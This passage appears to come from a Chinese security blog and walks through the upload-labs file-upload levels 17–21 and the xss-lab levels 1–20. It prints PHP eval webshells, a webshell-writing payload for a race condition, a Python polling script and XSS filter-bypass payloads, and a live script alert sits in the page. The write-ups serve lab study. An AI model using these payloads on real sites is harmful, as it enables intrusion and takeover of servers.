class="line"></span><br><span class="line">    &#125;<span class="keyword">else</span> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">&quot;png&quot;</span>) &amp;&amp; (<span class="variable">$filetype</span>==<span class="string">&quot;image/png&quot;</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>))&#123;</span><br><span class="line">            <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line">            <span class="variable">$im</span> = <span class="title function_ invoke__">imagecreatefrompng</span>(<span class="variable">$target_path</span>);</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>)&#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&quot;该文件不是png格式的图片！&quot;</span>;</span><br><span class="line">                @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line">            &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                 <span class="comment">//给新图片指定文件名</span></span><br><span class="line">                <span class="title function_ invoke__">srand</span>(<span class="title function_ invoke__">time</span>());</span><br><span class="line">                <span class="variable">$newfilename</span> = <span class="title function_ invoke__">strval</span>(<span class="title function_ invoke__">rand</span>()).<span class="string">&quot;.png&quot;</span>;</span><br><span class="line">                <span class="comment">//显示二次渲染后的图片（使用用户上传图片生成的新图片）</span></span><br><span class="line">                <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$newfilename</span>;</span><br><span class="line">                <span class="title function_ invoke__">imagepng</span>(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"></span><br><span class="line">                @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line">                <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&quot;上传出错！&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;<span class="keyword">else</span> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">&quot;gif&quot;</span>) &amp;&amp; (<span class="variable">$filetype</span>==<span class="string">&quot;image/gif&quot;</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>))&#123;</span><br><span class="line">            <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line">            <span class="variable">$im</span> = <span class="title function_ invoke__">imagecreatefromgif</span>(<span class="variable">$target_path</span>);</span><br><span class="line">            <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>)&#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&quot;该文件不是gif格式的图片！&quot;</span>;</span><br><span class="line">                @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line">            &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="comment">//给新图片指定文件名</span></span><br><span class="line">                <span class="title function_ invoke__">srand</span>(<span class="title function_ invoke__">time</span>());</span><br><span class="line">                <span class="variable">$newfilename</span> = <span class="title function_ invoke__">strval</span>(<span class="title function_ invoke__">rand</span>()).<span class="string">&quot;.gif&quot;</span>;</span><br><span class="line">                <span class="comment">//显示二次渲染后的图片（使用用户上传图片生成的新图片）</span></span><br><span class="line">                <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$newfilename</span>;</span><br><span class="line">                <span class="title function_ invoke__">imagegif</span>(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"></span><br><span class="line">                @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line">                <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&quot;上传出错！&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="variable">$msg</span> = <span class="string">&quot;只允许上传后缀为.jpg|.png|.gif的图片文件！&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里进行了许多步过滤</p>
<p>简单总结下主要的就是</p>
<ol>
<li>对 gif、png 或 jpg 文件的格式进行二次渲染</li>
<li>根据上传的文件类型用 imagecreatefromgif 这一类的函数生成一个新的图片</li>
<li>将原本保存下的文件用 unlink 函数删除</li>
</ol>
<p>据师傅说<strong>直接用 cmd 命令行 copy 的文件也能成功上传</strong></p>
<p>也可以用 010editor 比较二次渲染前后的图片</p>
<p>蓝色的部分是未被改变的</p>
<p>可以在那里插入 🐎</p>
<h2 id="pass-18"><a href="#pass-18" class="headerlink" title="pass-18"></a>pass-18</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">&#x27;jpg&#x27;</span>,<span class="string">&#x27;png&#x27;</span>,<span class="string">&#x27;gif&#x27;</span>);</span><br><span class="line">    <span class="variable">$file_name</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">    <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">    <span class="variable">$file_ext</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$file_name</span>,<span class="title function_ invoke__">strrpos</span>(<span class="variable">$file_name</span>,<span class="string">&quot;.&quot;</span>)+<span class="number">1</span>);</span><br><span class="line">    <span class="variable">$upload_file</span> = UPLOAD_PATH . <span class="string">&#x27;/&#x27;</span> . <span class="variable">$file_name</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$upload_file</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>))&#123;</span><br><span class="line">             <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">&#x27;/&#x27;</span>. <span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">&quot;YmdHis&quot;</span>).<span class="string">&quot;.&quot;</span>.<span class="variable">$file_ext</span>;</span><br><span class="line">             <span class="title function_ invoke__">rename</span>(<span class="variable">$upload_file</span>, <span class="variable">$img_path</span>);</span><br><span class="line">             <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&quot;只允许上传.jpg|.png|.gif类型文件！&quot;</span>;</span><br><span class="line">            <span class="title function_ invoke__">unlink</span>(<span class="variable">$upload_file</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="variable">$msg</span> = <span class="string">&#x27;上传出错！&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里过滤的挺充分的</p>
<p>不过黑客大佬们还是有方法</p>
<p>原理简单来说是</p>
<ol>
<li>文件上传后到原文件被删除有一段时间</li>
<li>利用这段时间 重复发送写入木马的木马</li>
<li>然后不停访问原文件</li>
<li>访问成功后 木马也就被重新写入</li>
</ol>
<p>写入木马的木马</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">puts</span>(<span class="title function_ invoke__">fopen</span>(<span class="string">&#x27;shell.php&#x27;</span>,<span class="string">&#x27;r+&#x27;</span>),<span class="string">&#x27;&lt;? @eval($_POST[&#x27;</span>shell<span class="string">&#x27;]);?&gt;&#x27;</span>);<span class="meta">?&gt;</span><span class="comment">//发送的木马</span></span><br></pre></td></tr></table></figure>

<p>重复发送利用 burp 实现</p>
<ol>
<li>用 burpsuite 抓包</li>
<li>调用 intruder 模块</li>
<li>打开 payload 板块设置 payload type 为 null payloads</li>
<li>点击下方的 continue indefinitely</li>
</ol>
<p>连续访问利用脚本实现</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://ip/upload-labs/upload/shell.php&quot;</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">		html = requests.get(url)</span><br><span class="line">		<span class="keyword">if</span> html.status_code == <span class="number">200</span>:</span><br><span class="line">			<span class="built_in">print</span>(<span class="string">&quot;success&quot;</span>)</span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line">         <span class="keyword">else</span></span><br><span class="line">			<span class="built_in">print</span>(<span class="string">&quot;200&quot;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="pass-19"><a href="#pass-19" class="headerlink" title="pass-19"></a>pass-19</h2><p>这一关和上面很像</p>
<p>不过 python 连续访问的 url 要变成</p>
<figure class="highlight mathematica"><table><tr><td class="code"><pre><span class="line"><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span><span class="variable">upload</span><span class="operator">-</span><span class="variable">labs</span><span class="operator">-</span><span class="variable">master</span><span class="operator">/</span><span class="variable">include</span><span class="operator">.</span><span class="variable">php</span><span class="operator">?</span><span class="variable">file</span><span class="operator">=</span><span class="variable">upload</span><span class="operator">/</span><span class="variable">shell</span><span class="operator">.</span><span class="variable">jpg</span></span><br></pre></td></tr></table></figure>

<h2 id="pass-20"><a href="#pass-20" class="headerlink" title="pass-20"></a>pass-20</h2><p>这关绕过方法用之前的<code>.php.</code>就可以</p>
<p>不过这关和之前有个很明显的区别</p>
<p>做了个保存名称的 input</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) &#123;</span><br><span class="line">        <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">&quot;php&quot;</span>,<span class="string">&quot;php5&quot;</span>,<span class="string">&quot;php4&quot;</span>,<span class="string">&quot;php3&quot;</span>,<span class="string">&quot;php2&quot;</span>,<span class="string">&quot;html&quot;</span>,<span class="string">&quot;htm&quot;</span>,<span class="string">&quot;phtml&quot;</span>,<span class="string">&quot;pht&quot;</span>,<span class="string">&quot;jsp&quot;</span>,<span class="string">&quot;jspa&quot;</span>,<span class="string">&quot;jspx&quot;</span>,<span class="string">&quot;jsw&quot;</span>,<span class="string">&quot;jsv&quot;</span>,<span class="string">&quot;jspf&quot;</span>,<span class="string">&quot;jtml&quot;</span>,<span class="string">&quot;asp&quot;</span>,<span class="string">&quot;aspx&quot;</span>,<span class="string">&quot;asa&quot;</span>,<span class="string">&quot;asax&quot;</span>,<span class="string">&quot;ascx&quot;</span>,<span class="string">&quot;ashx&quot;</span>,<span class="string">&quot;asmx&quot;</span>,<span class="string">&quot;cer&quot;</span>,<span class="string">&quot;swf&quot;</span>,<span class="string">&quot;htaccess&quot;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="variable">$file_name</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;save_name&#x27;</span>];</span><br><span class="line">        <span class="variable">$file_ext</span> = <span class="title function_ invoke__">pathinfo</span>(<span class="variable">$file_name</span>,PATHINFO_EXTENSION);<span class="comment">//在这里</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>,<span class="variable">$deny_ext</span>)) &#123;</span><br><span class="line">            <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">            <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">&#x27;/&#x27;</span> .<span class="variable">$file_name</span>;</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) &#123;</span><br><span class="line">                <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">            &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&#x27;上传出错！&#x27;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&#x27;禁止保存为该类型文件！&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">&#x27;文件夹不存在,请手工创建！&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="pass-21"><a href="#pass-21" class="headerlink" title="pass-21"></a>pass-21</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>]))&#123;</span><br><span class="line">    <span class="comment">//检查MIME</span></span><br><span class="line">    <span class="variable">$allow_type</span> = <span class="keyword">array</span>(<span class="string">&#x27;image/jpeg&#x27;</span>,<span class="string">&#x27;image/png&#x27;</span>,<span class="string">&#x27;image/gif&#x27;</span>);</span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">in_array</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>],<span class="variable">$allow_type</span>))&#123;</span><br><span class="line">        <span class="variable">$msg</span> = <span class="string">&quot;禁止上传该类型文件!&quot;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="comment">//检查文件名</span></span><br><span class="line">        <span class="variable">$file</span> = <span class="keyword">empty</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;save_name&#x27;</span>]) ? <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>] : <span class="variable">$_POST</span>[<span class="string">&#x27;save_name&#x27;</span>];</span><br><span class="line">        <span class="keyword">if</span> (!<span class="title function_ invoke__">is_array</span>(<span class="variable">$file</span>)) &#123;</span><br><span class="line">            <span class="variable">$file</span> = <span class="title function_ invoke__">explode</span>(<span class="string">&#x27;.&#x27;</span>, <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file</span>));</span><br><span class="line">            <span class="comment">//explode(separator,string[,limit]) 函数，使用一个字符串分割另一个字符串，并返回由字符串组成的数组。</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="variable">$ext</span> = <span class="title function_ invoke__">end</span>(<span class="variable">$file</span>);<span class="comment">//end(array)函数，输出数组中的当前元素和最后一个元素的值。</span></span><br><span class="line">        <span class="variable">$allow_suffix</span> = <span class="keyword">array</span>(<span class="string">&#x27;jpg&#x27;</span>,<span class="string">&#x27;png&#x27;</span>,<span class="string">&#x27;gif&#x27;</span>);</span><br><span class="line">        <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$ext</span>, <span class="variable">$allow_suffix</span>)) &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&quot;禁止上传该后缀文件!&quot;</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="variable">$file_name</span> = <span class="title function_ invoke__">reset</span>(<span class="variable">$file</span>) . <span class="string">&#x27;.&#x27;</span> . <span class="variable">$file</span>[<span class="title function_ invoke__">count</span>(<span class="variable">$file</span>) - <span class="number">1</span>];</span><br><span class="line">            <span class="comment">//reset(array)函数，把数组的内部指针指向第一个元素，并返回这个元素的值</span></span><br><span class="line">            <span class="comment">//count(array)函数，计算数组中的单元数目，或对象中的属性个数</span></span><br><span class="line">            <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">            <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">&#x27;/&#x27;</span> .<span class="variable">$file_name</span>;</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) &#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&quot;文件上传成功！&quot;</span>;</span><br><span class="line">                <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&quot;文件上传失败！&quot;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="variable">$msg</span> = <span class="string">&quot;请选择要上传的文件！&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ol>
<li>验证上传路径是否存在验证[‘upload_file’]的 content-type 是否合法（可以抓包修改）</li>
<li>判断 POST 参数是否为空定义$file 变量（关键：构造数组绕过下一步的判断）</li>
<li>判断 file 不是数组则使用 explode(‘.’, strtolower($file))对 file 进行切割，将 file 变为一个数组</li>
<li>判断数组最后一个元素是否合法</li>
<li>数组第一位和<code>$file[count($file) - 1]</code>进行拼接，产生保存文件名 file_name</li>
<li>上传文件</li>
</ol>
<p>这里可以用 00 截断</p>
<p>也可以用数组绕过</p>
<p>post 包</p>
<figure class="highlight css"><table><tr><td class="code"><pre><span class="line">-----------------------------<span class="number">131314876217456529963542266439</span></span><br><span class="line"><span class="attribute">Content</span>-Disposition: form-data; name=&quot;upload_file&quot;; filename=&quot;yijuhua<span class="selector-class">.php</span>&quot;</span><br><span class="line"><span class="attribute">Content</span>-Type: image/png</span><br><span class="line"></span><br><span class="line">&lt;?php @<span class="built_in">eval</span>($_POST[<span class="string">&#x27;hack&#x27;</span>]);?&gt;</span><br><span class="line">-----------------------------<span class="number">131314876217456529963542266439</span></span><br><span class="line"><span class="attribute">Content</span>-Disposition: form-data; name=&quot;save_name<span class="selector-attr">[0]</span>&quot;</span><br><span class="line"></span><br><span class="line">upload-<span class="number">20</span><span class="selector-class">.php</span></span><br><span class="line">-----------------------------<span class="number">131314876217456529963542266439</span></span><br><span class="line"><span class="attribute">Content</span>-Disposition: form-data; name=&quot;save_name<span class="selector-attr">[2]</span>&quot;</span><br><span class="line"></span><br><span class="line">jpg</span><br><span class="line">-----------------------------<span class="number">131314876217456529963542266439</span></span><br><span class="line"><span class="attribute">Content</span>-Disposition: form-data; name=&quot;submit&quot;</span><br><span class="line"></span><br><span class="line">上传</span><br><span class="line">-----------------------------<span class="number">131314876217456529963542266439</span>--</span><br><span class="line"></span><br></pre></td></tr></table></figure>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>upload</tag>
        <tag>upload-labs</tag>
      </tags>
  </entry>
  <entry>
    <title>xss-lab</title>
    <url>/2023/07/xsslab/</url>
    <content><![CDATA[<h2 id="level-1"><a href="#level-1" class="headerlink" title="level 1"></a>level 1</h2><p>没啥好说的<br>直接 alert<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254223669-151.png" alt="在这里插入图片描述"></p>
<h2 id="level-2"><a href="#level-2" class="headerlink" title="level 2"></a>level 2</h2><figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">name</span>=<span class="string">keyword</span>  <span class="attr">value</span>=<span class="string">&quot;test&quot;</span>&gt;</span></span><br><span class="line">//改后是</span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">name</span>=<span class="string">keyword</span>  <span class="attr">value</span>=<span class="string">&quot;1111&quot;</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-handlebars"><span class="language-xml">……&gt;//</span></span></span><br><span class="line"><span class="language-xml"><span class="language-handlebars">1111&quot;&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span>……这是输入的部分</span></span></span><br><span class="line"><span class="language-xml"><span class="language-handlebars">前后闭合</span></span></span><br></pre></td></tr></table></figure>

<h2 id="level-3"><a href="#level-3" class="headerlink" title="level 3"></a>level 3</h2><p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254225731-154.png" alt="在这里插入图片描述"><br>用了 htmlspeialchars()函数 &lt;&gt;”都被过滤<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254227235-157.png" alt="在这里插入图片描述">二者都写可以</p>
<h2 id="level-4"><a href="#level-4" class="headerlink" title="level 4"></a>level 4</h2><p>和上面一样</p>
<h2 id="level-5"><a href="#level-5" class="headerlink" title="level 5"></a>level 5</h2><p>on 和 script 都被过滤<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254229213-160.png" alt="在这里插入图片描述">这里用 javascript:伪协议<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254230943-163.png" alt="在这里插入图片描述">出来的链接就是答案</p>
<h2 id="level-6"><a href="#level-6" class="headerlink" title="level 6"></a>level 6</h2><p>可以大小写绕过</p>
<h2 id="level-7"><a href="#level-7" class="headerlink" title="level 7"></a>level 7</h2><p>把特殊字符便空了<br>可以双写绕过</p>
<h2 id="level-8"><a href="#level-8" class="headerlink" title="level 8"></a>level 8</h2><p>这关卡的死死的<br>要编码绕过<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254233662-166.png"></p>
<h2 id="level-9"><a href="#level-9" class="headerlink" title="level 9"></a>level 9</h2><p>strpos 函数看是否有 http:&#x2F;&#x2F;<br>验证是否为安全连接<br>但是没有限定位置<br>要编码下<br>还要把 http:&#x2F;&#x2F;放最后面用&#x2F;&#x2F;注释掉<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254238979-169.png" alt="在这里插入图片描述"></p>
<h2 id="level-10-13"><a href="#level-10-13" class="headerlink" title="level 10-13"></a>level 10-13</h2><p>页面没有注入点<br>看源代码发现隐藏的表单<br>要改为文本框 text</p>
<figure class="highlight css"><table><tr><td class="code"><pre><span class="line">type=&quot;<span class="selector-tag">text</span>&quot; onclick=&quot;alert(<span class="number">1</span>)&quot;</span><br></pre></td></tr></table></figure>

<p>后面几关都要改 t_sort<br>因为后端获取 t_sort 和 user-agent 等<br>要从相应注入点注入<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254242198-172.png" alt="在这里插入图片描述"></p>
<h2 id="level-14"><a href="#level-14" class="headerlink" title="level 14"></a>level 14</h2><blockquote>
<p>exif xss 漏洞，exif 是可交换图像文件格式（英语：Exchangeable image file format，官方简称 Exif），是专门为数码相机的照片设定的，可以记录数码照片的属性信息和拍摄数据。我们右键图片选择属性，点击详细信息就可以看到 exif 的相关属性。</p>
<p>喜欢摄影的应该都知道一张照片可以看快门时间 快门次数等很多参数<br>甚至有些照片能看到经纬度<br>这关要用到<br><a href="http://ww1.exifviewer.org/">exifviewer</a>网页<br>但是<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254247114-178.png" alt="在这里插入图片描述"><br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254245020-175.png" alt="在这里插入图片描述"></p>
</blockquote>
<h2 id="level-15"><a href="#level-15" class="headerlink" title="level 15"></a>level 15</h2><h2 id="level-16"><a href="#level-16" class="headerlink" title="level 16"></a>level 16</h2><p>对 script、&#x2F;、空格进行了转换<br>空格不可以就用换行符</p>
<figure class="highlight css"><table><tr><td class="code"><pre><span class="line">&lt;<span class="selector-tag">a</span>%<span class="number">0</span>atype=&quot;<span class="selector-tag">text</span>&quot;%<span class="number">0</span>a&quot;alert&quot;&gt;</span><br></pre></td></tr></table></figure>

<h2 id="level-17-18"><a href="#level-17-18" class="headerlink" title="level 17-18"></a>level 17-18</h2><p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254252815-181.png" alt="在这里插入图片描述"><br>火狐不支持 swf 格式<br>把链接加网页上显示出这样<br>很奇怪<br>开始整套娃了<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254256501-184.png" alt="在这里插入图片描述"></p>
<p>要找个支持 flash 的浏览器才能正常打开<br>17-20 关都能用 flash xss<br><a href="https://www.secpulse.com/archives/44299.html">flash xss 原理</a><br>但这里先用别的办法<br>以 18 关为例<br>注入点可以在 arg02<br>但是你连 swf 都没有哪来的 moouseover 哪<br>所以得 url 连接一下</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">http://<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/xss-labs/level18.php/xsf02.swf?a=?arg01=a&amp;arg02=%20onmouseover=javascript:alert(<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254258261-187.png" alt="在这里插入图片描述"></p>
<h2 id="level-19-20"><a href="#level-19-20" class="headerlink" title="level 19-20"></a>level 19-20</h2><p><a href="https://www.cnblogs.com/-qing-/p/10853379.html">Flash XSS 漏洞快速上手</a><br><a href="https://www.secpulse.com/archives/44299.html">flash xss 原理</a><br><a href="https://github.com/jindrapetrik/jpexs-decompiler">flash 反编译工具</a><br>以下是大佬的 payload</p>
<blockquote>
<p>卑微小杨在线 emo<br>flash 反编译也不懂<br>等有空了再研究吧<br>好多困难等着被克服那<br>这次没支持 flash 的浏览器真没法做</p>
<p>18 关</p>
</blockquote>
<figure class="highlight css"><table><tr><td class="code"><pre><span class="line">http: //<span class="number">10.0</span>.<span class="number">1.83</span>/xsslab/level19.php?arg01=version&amp;arg02=&lt;a href=<span class="string">&quot;javascript:alert(/bmfx/)&quot;</span>&gt;bmfx&lt;/a&gt; ;</span><br></pre></td></tr></table></figure>

<p>19 关</p>
<figure class="highlight css"><table><tr><td class="code"><pre><span class="line">http: ; //<span class="number">10.0</span>.<span class="number">1.83</span>/xsslab/level20<span class="selector-class">.php</span>?arg01=id&amp;arg02=bmfx\&quot;))&#125;catch(e)&#123;alert(/bmfx/)&#125;//%<span class="number">26</span>width=<span class="number">998%</span><span class="number">26</span>height=<span class="number">998</span></span><br></pre></td></tr></table></figure>

<script>
setTimeout(function () {
    alert('xss');
}, 1000);
</script>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>xss</tag>
        <tag>xss-lab</tag>
      </tags>
  </entry>
  <entry>
    <title>终端便捷ssh（免密）连接</title>
    <url>/2023/07/%E5%85%8D%E5%AF%86ssh%E7%99%BB%E5%BD%95/</url>
    <content><![CDATA[<h2 id="普通-ssh-方法"><a href="#普通-ssh-方法" class="headerlink" title="普通 ssh 方法"></a>普通 ssh 方法</h2><p>物理机 ssh 连接虚拟机</p>
<p>没基础的可以这样连：复杂</p>
